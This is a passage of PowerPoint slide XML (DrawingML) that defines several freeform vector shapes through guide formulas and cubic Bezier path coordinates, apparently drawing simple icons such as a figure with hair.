                      <a:pt x="77" y="170"/>
                      <a:pt x="77" y="170"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="272" y="61"/>
                      <a:pt x="272" y="61"/>
                      <a:pt x="272" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="283" y="55"/>
                      <a:pt x="298" y="59"/>
                      <a:pt x="304" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="310" y="81"/>
                      <a:pt x="306" y="95"/>
                      <a:pt x="295" y="102"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="226"/>
                      <a:pt x="72" y="226"/>
                      <a:pt x="72" y="226"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="228"/>
                      <a:pt x="64" y="229"/>
                      <a:pt x="60" y="229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40" name="Freeform 684">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{093D6196-C616-4415-B58C-D6B58EA561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201" y="11788776"/>
                <a:ext cx="128588" cy="95250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 250 w 311"/>
                  <a:gd name="T1" fmla="*/ 229 h 229"/>
                  <a:gd name="T2" fmla="*/ 238 w 311"/>
                  <a:gd name="T3" fmla="*/ 226 h 229"/>
                  <a:gd name="T4" fmla="*/ 15 w 311"/>
                  <a:gd name="T5" fmla="*/ 101 h 229"/>
                  <a:gd name="T6" fmla="*/ 6 w 311"/>
                  <a:gd name="T7" fmla="*/ 69 h 229"/>
                  <a:gd name="T8" fmla="*/ 38 w 311"/>
                  <a:gd name="T9" fmla="*/ 61 h 229"/>
                  <a:gd name="T10" fmla="*/ 233 w 311"/>
                  <a:gd name="T11" fmla="*/ 169 h 229"/>
                  <a:gd name="T12" fmla="*/ 262 w 311"/>
                  <a:gd name="T13" fmla="*/ 21 h 229"/>
                  <a:gd name="T14" fmla="*/ 290 w 311"/>
                  <a:gd name="T15" fmla="*/ 2 h 229"/>
                  <a:gd name="T16" fmla="*/ 308 w 311"/>
                  <a:gd name="T17" fmla="*/ 30 h 229"/>
                  <a:gd name="T18" fmla="*/ 273 w 311"/>
                  <a:gd name="T19" fmla="*/ 210 h 229"/>
                  <a:gd name="T20" fmla="*/ 260 w 311"/>
                  <a:gd name="T21" fmla="*/ 226 h 229"/>
                  <a:gd name="T22" fmla="*/ 250 w 311"/>
                  <a:gd name="T23" fmla="*/ 229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1" h="229">
                    <a:moveTo>
                      <a:pt x="250" y="229"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="246" y="229"/>
                      <a:pt x="242" y="228"/>
                      <a:pt x="238" y="226"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="101"/>
                      <a:pt x="15" y="101"/>
                      <a:pt x="15" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="95"/>
                      <a:pt x="0" y="81"/>
                      <a:pt x="6" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="58"/>
                      <a:pt x="27" y="54"/>
                      <a:pt x="38" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="233" y="169"/>
                      <a:pt x="233" y="169"/>
                      <a:pt x="233" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="262" y="21"/>
                      <a:pt x="262" y="21"/>
                      <a:pt x="262" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="265" y="8"/>
                      <a:pt x="277" y="0"/>
                      <a:pt x="290" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="302" y="5"/>
                      <a:pt x="311" y="17"/>
                      <a:pt x="308" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="273" y="210"/>
                      <a:pt x="273" y="210"/>
                      <a:pt x="273" y="210"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="271" y="217"/>
                      <a:pt x="266" y="223"/>
                      <a:pt x="260" y="226"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="256" y="228"/>
                      <a:pt x="253" y="229"/>
                      <a:pt x="250" y="229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41" name="Freeform 685">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AAAD3A2-9E3C-417E-A79F-2C7A3A5B6A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94201" y="11853863"/>
                <a:ext cx="20638" cy="185738"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 47"/>
                  <a:gd name="T1" fmla="*/ 447 h 447"/>
                  <a:gd name="T2" fmla="*/ 0 w 47"/>
                  <a:gd name="T3" fmla="*/ 424 h 447"/>
                  <a:gd name="T4" fmla="*/ 0 w 47"/>
                  <a:gd name="T5" fmla="*/ 23 h 447"/>
                  <a:gd name="T6" fmla="*/ 23 w 47"/>
                  <a:gd name="T7" fmla="*/ 0 h 447"/>
                  <a:gd name="T8" fmla="*/ 47 w 47"/>
                  <a:gd name="T9" fmla="*/ 23 h 447"/>
                  <a:gd name="T10" fmla="*/ 47 w 47"/>
                  <a:gd name="T11" fmla="*/ 424 h 447"/>
                  <a:gd name="T12" fmla="*/ 23 w 47"/>
                  <a:gd name="T13" fmla="*/ 447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447">
                    <a:moveTo>
                      <a:pt x="23" y="447"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="447"/>
                      <a:pt x="0" y="437"/>
                      <a:pt x="0" y="424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1" y="0"/>
                      <a:pt x="23" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="0"/>
                      <a:pt x="47" y="10"/>
                      <a:pt x="47" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="424"/>
                      <a:pt x="47" y="424"/>
                      <a:pt x="47" y="424"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="437"/>
                      <a:pt x="36" y="447"/>
                      <a:pt x="23" y="447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C9BCE4D3-9A4A-410D-96AE-02DBF58076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922908" y="4935303"/>
              <a:ext cx="517814" cy="740539"/>
              <a:chOff x="10847388" y="9572625"/>
              <a:chExt cx="442913" cy="633413"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Freeform 1084">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968569F1-3B83-4E42-986E-CC5F77E844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53738" y="9698038"/>
                <a:ext cx="65088" cy="320675"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 76 w 159"/>
                  <a:gd name="T1" fmla="*/ 774 h 774"/>
                  <a:gd name="T2" fmla="*/ 53 w 159"/>
                  <a:gd name="T3" fmla="*/ 751 h 774"/>
                  <a:gd name="T4" fmla="*/ 53 w 159"/>
                  <a:gd name="T5" fmla="*/ 709 h 774"/>
                  <a:gd name="T6" fmla="*/ 74 w 159"/>
                  <a:gd name="T7" fmla="*/ 603 h 774"/>
                  <a:gd name="T8" fmla="*/ 89 w 159"/>
                  <a:gd name="T9" fmla="*/ 574 h 774"/>
                  <a:gd name="T10" fmla="*/ 52 w 159"/>
                  <a:gd name="T11" fmla="*/ 471 h 774"/>
                  <a:gd name="T12" fmla="*/ 23 w 159"/>
                  <a:gd name="T13" fmla="*/ 428 h 774"/>
                  <a:gd name="T14" fmla="*/ 46 w 159"/>
                  <a:gd name="T15" fmla="*/ 201 h 774"/>
                  <a:gd name="T16" fmla="*/ 87 w 159"/>
                  <a:gd name="T17" fmla="*/ 20 h 774"/>
                  <a:gd name="T18" fmla="*/ 115 w 159"/>
                  <a:gd name="T19" fmla="*/ 2 h 774"/>
                  <a:gd name="T20" fmla="*/ 133 w 159"/>
                  <a:gd name="T21" fmla="*/ 30 h 774"/>
                  <a:gd name="T22" fmla="*/ 91 w 159"/>
                  <a:gd name="T23" fmla="*/ 212 h 774"/>
                  <a:gd name="T24" fmla="*/ 65 w 159"/>
                  <a:gd name="T25" fmla="*/ 408 h 774"/>
                  <a:gd name="T26" fmla="*/ 89 w 159"/>
                  <a:gd name="T27" fmla="*/ 444 h 774"/>
                  <a:gd name="T28" fmla="*/ 130 w 159"/>
                  <a:gd name="T29" fmla="*/ 595 h 774"/>
                  <a:gd name="T30" fmla="*/ 115 w 159"/>
                  <a:gd name="T31" fmla="*/ 624 h 774"/>
                  <a:gd name="T32" fmla="*/ 99 w 159"/>
                  <a:gd name="T33" fmla="*/ 709 h 774"/>
                  <a:gd name="T34" fmla="*/ 99 w 159"/>
                  <a:gd name="T35" fmla="*/ 751 h 774"/>
                  <a:gd name="T36" fmla="*/ 76 w 159"/>
                  <a:gd name="T37" fmla="*/ 774 h 7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9" h="774">
                    <a:moveTo>
                      <a:pt x="76" y="774"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="774"/>
                      <a:pt x="53" y="764"/>
                      <a:pt x="53" y="751"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="734"/>
                      <a:pt x="53" y="721"/>
                      <a:pt x="53" y="709"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="648"/>
                      <a:pt x="52" y="643"/>
                      <a:pt x="74" y="603"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="595"/>
                      <a:pt x="83" y="586"/>
                      <a:pt x="89" y="574"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="545"/>
                      <a:pt x="83" y="513"/>
                      <a:pt x="52" y="471"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="456"/>
                      <a:pt x="30" y="442"/>
                      <a:pt x="23" y="428"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="380"/>
                      <a:pt x="18" y="309"/>
                      <a:pt x="46" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="149"/>
                      <a:pt x="73" y="90"/>
                      <a:pt x="87" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="8"/>
                      <a:pt x="102" y="0"/>
                      <a:pt x="115" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="5"/>
                      <a:pt x="135" y="17"/>
                      <a:pt x="133" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="100"/>
                      <a:pt x="104" y="159"/>
                      <a:pt x="91" y="212"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="307"/>
                      <a:pt x="50" y="375"/>
                      <a:pt x="65" y="408"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="418"/>
                      <a:pt x="79" y="430"/>
                      <a:pt x="89" y="444"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="483"/>
                      <a:pt x="159" y="537"/>
                      <a:pt x="130" y="595"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="607"/>
                      <a:pt x="119" y="616"/>
                      <a:pt x="115" y="624"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="655"/>
                      <a:pt x="99" y="655"/>
                      <a:pt x="99" y="709"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="720"/>
                      <a:pt x="99" y="734"/>
                      <a:pt x="99" y="751"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="764"/>
                      <a:pt x="89" y="774"/>
                      <a:pt x="76" y="774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23" name="Freeform 1085">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE54BACD-104E-4D1C-948A-35FF18BDBC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7238" y="9572625"/>
                <a:ext cx="373063" cy="454025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 770 w 898"/>
                  <a:gd name="T1" fmla="*/ 1095 h 1095"/>
                  <a:gd name="T2" fmla="*/ 752 w 898"/>
                  <a:gd name="T3" fmla="*/ 1086 h 1095"/>
                  <a:gd name="T4" fmla="*/ 756 w 898"/>
                  <a:gd name="T5" fmla="*/ 1054 h 1095"/>
                  <a:gd name="T6" fmla="*/ 809 w 898"/>
                  <a:gd name="T7" fmla="*/ 869 h 1095"/>
                  <a:gd name="T8" fmla="*/ 663 w 898"/>
                  <a:gd name="T9" fmla="*/ 330 h 1095"/>
                  <a:gd name="T10" fmla="*/ 327 w 898"/>
                  <a:gd name="T11" fmla="*/ 47 h 1095"/>
                  <a:gd name="T12" fmla="*/ 44 w 898"/>
                  <a:gd name="T13" fmla="*/ 193 h 1095"/>
                  <a:gd name="T14" fmla="*/ 12 w 898"/>
                  <a:gd name="T15" fmla="*/ 198 h 1095"/>
                  <a:gd name="T16" fmla="*/ 7 w 898"/>
                  <a:gd name="T17" fmla="*/ 165 h 1095"/>
                  <a:gd name="T18" fmla="*/ 327 w 898"/>
                  <a:gd name="T19" fmla="*/ 0 h 1095"/>
                  <a:gd name="T20" fmla="*/ 710 w 898"/>
                  <a:gd name="T21" fmla="*/ 326 h 1095"/>
                  <a:gd name="T22" fmla="*/ 851 w 898"/>
                  <a:gd name="T23" fmla="*/ 851 h 1095"/>
                  <a:gd name="T24" fmla="*/ 785 w 898"/>
                  <a:gd name="T25" fmla="*/ 1090 h 1095"/>
                  <a:gd name="T26" fmla="*/ 770 w 898"/>
                  <a:gd name="T27" fmla="*/ 1095 h 10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98" h="1095">
                    <a:moveTo>
                      <a:pt x="770" y="1095"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="763" y="1095"/>
                      <a:pt x="757" y="1092"/>
                      <a:pt x="752" y="1086"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="744" y="1076"/>
                      <a:pt x="746" y="1062"/>
                      <a:pt x="756" y="1054"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="760" y="1051"/>
                      <a:pt x="853" y="974"/>
                      <a:pt x="809" y="869"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="728" y="677"/>
                      <a:pt x="679" y="496"/>
                      <a:pt x="663" y="330"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="649" y="185"/>
                      <a:pt x="486" y="47"/>
                      <a:pt x="327" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="221" y="47"/>
                      <a:pt x="113" y="103"/>
                      <a:pt x="44" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="203"/>
                      <a:pt x="22" y="205"/>
                      <a:pt x="12" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="190"/>
                      <a:pt x="0" y="175"/>
                      <a:pt x="7" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="64"/>
                      <a:pt x="207" y="0"/>
                      <a:pt x="327" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="508" y="0"/>
                      <a:pt x="694" y="159"/>
                      <a:pt x="710" y="326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="725" y="487"/>
                      <a:pt x="773" y="664"/>
                      <a:pt x="851" y="851"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="898" y="961"/>
                      <a:pt x="828" y="1056"/>
                      <a:pt x="785" y="1090"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="780" y="1094"/>
                      <a:pt x="775" y="1095"/>
                      <a:pt x="770" y="1095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24" name="Freeform 1086">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EECCBD1F-9190-42F1-8A16-5CAE4CC89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17238" y="9690100"/>
                <a:ext cx="273050" cy="236538"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 327 w 657"/>
                  <a:gd name="T1" fmla="*/ 569 h 569"/>
                  <a:gd name="T2" fmla="*/ 0 w 657"/>
                  <a:gd name="T3" fmla="*/ 248 h 569"/>
                  <a:gd name="T4" fmla="*/ 23 w 657"/>
                  <a:gd name="T5" fmla="*/ 225 h 569"/>
                  <a:gd name="T6" fmla="*/ 23 w 657"/>
                  <a:gd name="T7" fmla="*/ 225 h 569"/>
                  <a:gd name="T8" fmla="*/ 47 w 657"/>
                  <a:gd name="T9" fmla="*/ 248 h 569"/>
                  <a:gd name="T10" fmla="*/ 327 w 657"/>
                  <a:gd name="T11" fmla="*/ 523 h 569"/>
                  <a:gd name="T12" fmla="*/ 531 w 657"/>
                  <a:gd name="T13" fmla="*/ 447 h 569"/>
                  <a:gd name="T14" fmla="*/ 607 w 657"/>
                  <a:gd name="T15" fmla="*/ 263 h 569"/>
                  <a:gd name="T16" fmla="*/ 236 w 657"/>
                  <a:gd name="T17" fmla="*/ 64 h 569"/>
                  <a:gd name="T18" fmla="*/ 155 w 657"/>
                  <a:gd name="T19" fmla="*/ 139 h 569"/>
                  <a:gd name="T20" fmla="*/ 122 w 657"/>
                  <a:gd name="T21" fmla="*/ 137 h 569"/>
                  <a:gd name="T22" fmla="*/ 124 w 657"/>
                  <a:gd name="T23" fmla="*/ 105 h 569"/>
                  <a:gd name="T24" fmla="*/ 211 w 657"/>
                  <a:gd name="T25" fmla="*/ 24 h 569"/>
                  <a:gd name="T26" fmla="*/ 225 w 657"/>
                  <a:gd name="T27" fmla="*/ 18 h 569"/>
                  <a:gd name="T28" fmla="*/ 651 w 657"/>
                  <a:gd name="T29" fmla="*/ 248 h 569"/>
                  <a:gd name="T30" fmla="*/ 600 w 657"/>
                  <a:gd name="T31" fmla="*/ 434 h 569"/>
                  <a:gd name="T32" fmla="*/ 327 w 657"/>
                  <a:gd name="T33" fmla="*/ 569 h 5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657" h="569">
                    <a:moveTo>
                      <a:pt x="327" y="569"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="569"/>
                      <a:pt x="0" y="251"/>
                      <a:pt x="0" y="248"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="235"/>
                      <a:pt x="10" y="225"/>
                      <a:pt x="23" y="225"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="225"/>
                      <a:pt x="23" y="225"/>
                      <a:pt x="23" y="225"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="225"/>
                      <a:pt x="46" y="235"/>
                      <a:pt x="47" y="248"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="259"/>
                      <a:pt x="55" y="523"/>
                      <a:pt x="327" y="523"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="414" y="523"/>
                      <a:pt x="483" y="497"/>
                      <a:pt x="531" y="447"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="598" y="378"/>
                      <a:pt x="606" y="282"/>
                      <a:pt x="607" y="263"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="510" y="70"/>
                      <a:pt x="282" y="64"/>
                      <a:pt x="236" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="139"/>
                      <a:pt x="155" y="139"/>
                      <a:pt x="155" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="147"/>
                      <a:pt x="131" y="147"/>
                      <a:pt x="122" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="128"/>
                      <a:pt x="114" y="113"/>
                      <a:pt x="124" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="211" y="24"/>
                      <a:pt x="211" y="24"/>
                      <a:pt x="211" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="215" y="20"/>
                      <a:pt x="220" y="18"/>
                      <a:pt x="225" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="228" y="17"/>
                      <a:pt x="531" y="0"/>
                      <a:pt x="651" y="248"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="657" y="261"/>
                      <a:pt x="651" y="355"/>
                      <a:pt x="600" y="434"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="561" y="496"/>
                      <a:pt x="481" y="569"/>
                      <a:pt x="327" y="569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25" name="Freeform 1087">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ECFC745-A84A-449A-8C81-0DDC2EC9C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47388" y="9894888"/>
                <a:ext cx="146050" cy="311150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 351"/>
                  <a:gd name="T1" fmla="*/ 751 h 751"/>
                  <a:gd name="T2" fmla="*/ 3 w 351"/>
                  <a:gd name="T3" fmla="*/ 728 h 751"/>
                  <a:gd name="T4" fmla="*/ 3 w 351"/>
                  <a:gd name="T5" fmla="*/ 427 h 751"/>
                  <a:gd name="T6" fmla="*/ 81 w 351"/>
                  <a:gd name="T7" fmla="*/ 255 h 751"/>
                  <a:gd name="T8" fmla="*/ 304 w 351"/>
                  <a:gd name="T9" fmla="*/ 141 h 751"/>
                  <a:gd name="T10" fmla="*/ 304 w 351"/>
                  <a:gd name="T11" fmla="*/ 23 h 751"/>
                  <a:gd name="T12" fmla="*/ 327 w 351"/>
                  <a:gd name="T13" fmla="*/ 0 h 751"/>
                  <a:gd name="T14" fmla="*/ 351 w 351"/>
                  <a:gd name="T15" fmla="*/ 23 h 751"/>
                  <a:gd name="T16" fmla="*/ 351 w 351"/>
                  <a:gd name="T17" fmla="*/ 155 h 751"/>
                  <a:gd name="T18" fmla="*/ 338 w 351"/>
                  <a:gd name="T19" fmla="*/ 176 h 751"/>
                  <a:gd name="T20" fmla="*/ 103 w 351"/>
                  <a:gd name="T21" fmla="*/ 295 h 751"/>
                  <a:gd name="T22" fmla="*/ 49 w 351"/>
                  <a:gd name="T23" fmla="*/ 426 h 751"/>
                  <a:gd name="T24" fmla="*/ 49 w 351"/>
                  <a:gd name="T25" fmla="*/ 728 h 751"/>
                  <a:gd name="T26" fmla="*/ 26 w 351"/>
                  <a:gd name="T27" fmla="*/ 751 h 7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1" h="751">
                    <a:moveTo>
                      <a:pt x="26" y="751"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="751"/>
                      <a:pt x="3" y="740"/>
                      <a:pt x="3" y="728"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="427"/>
                      <a:pt x="3" y="427"/>
                      <a:pt x="3" y="427"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="422"/>
                      <a:pt x="0" y="299"/>
                      <a:pt x="81" y="255"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="223"/>
                      <a:pt x="264" y="161"/>
                      <a:pt x="304" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="304" y="23"/>
                      <a:pt x="304" y="23"/>
                      <a:pt x="304" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="304" y="11"/>
                      <a:pt x="315" y="0"/>
                      <a:pt x="327" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="340" y="0"/>
                      <a:pt x="351" y="11"/>
                      <a:pt x="351" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="351" y="155"/>
                      <a:pt x="351" y="155"/>
                      <a:pt x="351" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="351" y="164"/>
                      <a:pt x="346" y="172"/>
                      <a:pt x="338" y="176"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="336" y="177"/>
                      <a:pt x="172" y="258"/>
                      <a:pt x="103" y="295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="326"/>
                      <a:pt x="49" y="425"/>
                      <a:pt x="49" y="426"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="728"/>
                      <a:pt x="49" y="728"/>
                      <a:pt x="49" y="728"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="740"/>
                      <a:pt x="39" y="751"/>
                      <a:pt x="26" y="751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26" name="Freeform 1088">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D1E0B1-DE32-4820-AF3E-22A4973726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5676" y="9893300"/>
                <a:ext cx="146050" cy="312738"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 325 w 351"/>
                  <a:gd name="T1" fmla="*/ 754 h 754"/>
                  <a:gd name="T2" fmla="*/ 302 w 351"/>
                  <a:gd name="T3" fmla="*/ 731 h 754"/>
                  <a:gd name="T4" fmla="*/ 302 w 351"/>
                  <a:gd name="T5" fmla="*/ 427 h 754"/>
                  <a:gd name="T6" fmla="*/ 247 w 351"/>
                  <a:gd name="T7" fmla="*/ 295 h 754"/>
                  <a:gd name="T8" fmla="*/ 14 w 351"/>
                  <a:gd name="T9" fmla="*/ 182 h 754"/>
                  <a:gd name="T10" fmla="*/ 0 w 351"/>
                  <a:gd name="T11" fmla="*/ 160 h 754"/>
                  <a:gd name="T12" fmla="*/ 0 w 351"/>
                  <a:gd name="T13" fmla="*/ 23 h 754"/>
                  <a:gd name="T14" fmla="*/ 24 w 351"/>
                  <a:gd name="T15" fmla="*/ 0 h 754"/>
                  <a:gd name="T16" fmla="*/ 47 w 351"/>
                  <a:gd name="T17" fmla="*/ 23 h 754"/>
                  <a:gd name="T18" fmla="*/ 47 w 351"/>
                  <a:gd name="T19" fmla="*/ 146 h 754"/>
                  <a:gd name="T20" fmla="*/ 270 w 351"/>
                  <a:gd name="T21" fmla="*/ 254 h 754"/>
                  <a:gd name="T22" fmla="*/ 348 w 351"/>
                  <a:gd name="T23" fmla="*/ 427 h 754"/>
                  <a:gd name="T24" fmla="*/ 348 w 351"/>
                  <a:gd name="T25" fmla="*/ 731 h 754"/>
                  <a:gd name="T26" fmla="*/ 325 w 351"/>
                  <a:gd name="T27" fmla="*/ 754 h 7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1" h="754">
                    <a:moveTo>
                      <a:pt x="325" y="754"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="754"/>
                      <a:pt x="302" y="744"/>
                      <a:pt x="302" y="731"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="302" y="427"/>
                      <a:pt x="302" y="427"/>
                      <a:pt x="302" y="427"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="302" y="425"/>
                      <a:pt x="303" y="326"/>
                      <a:pt x="247" y="295"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="180" y="258"/>
                      <a:pt x="15" y="182"/>
                      <a:pt x="14" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="178"/>
                      <a:pt x="0" y="170"/>
                      <a:pt x="0" y="160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10"/>
                      <a:pt x="11" y="0"/>
                      <a:pt x="24" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="0"/>
                      <a:pt x="47" y="10"/>
                      <a:pt x="47" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="146"/>
                      <a:pt x="47" y="146"/>
                      <a:pt x="47" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="165"/>
                      <a:pt x="211" y="222"/>
                      <a:pt x="270" y="254"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="351" y="298"/>
                      <a:pt x="349" y="422"/>
                      <a:pt x="348" y="427"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="348" y="731"/>
                      <a:pt x="348" y="731"/>
                      <a:pt x="348" y="731"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="348" y="744"/>
                      <a:pt x="338" y="754"/>
